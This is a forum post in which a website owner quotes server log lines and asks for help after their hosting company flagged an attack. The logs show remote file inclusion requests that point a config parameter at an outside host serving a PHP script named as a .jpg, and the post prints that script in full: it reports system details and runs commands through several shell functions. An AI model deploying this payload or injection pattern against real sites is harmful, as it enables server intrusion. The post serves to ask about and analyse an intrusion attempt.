xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"
xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:17 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"
You will notice the 200 success code.
If you download this gambar.jpg file, you will see that it is a php script:
------- start gambar.jpg -------
Code: Select all
<?
$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
echo "<br>3"."1"."2"."3"."4<br>";
?>My hosting company has alerted me to this issue, I'm not sure what this script does that allows for a PHP injection if anything... if someone can help me put the pieces together that would be great.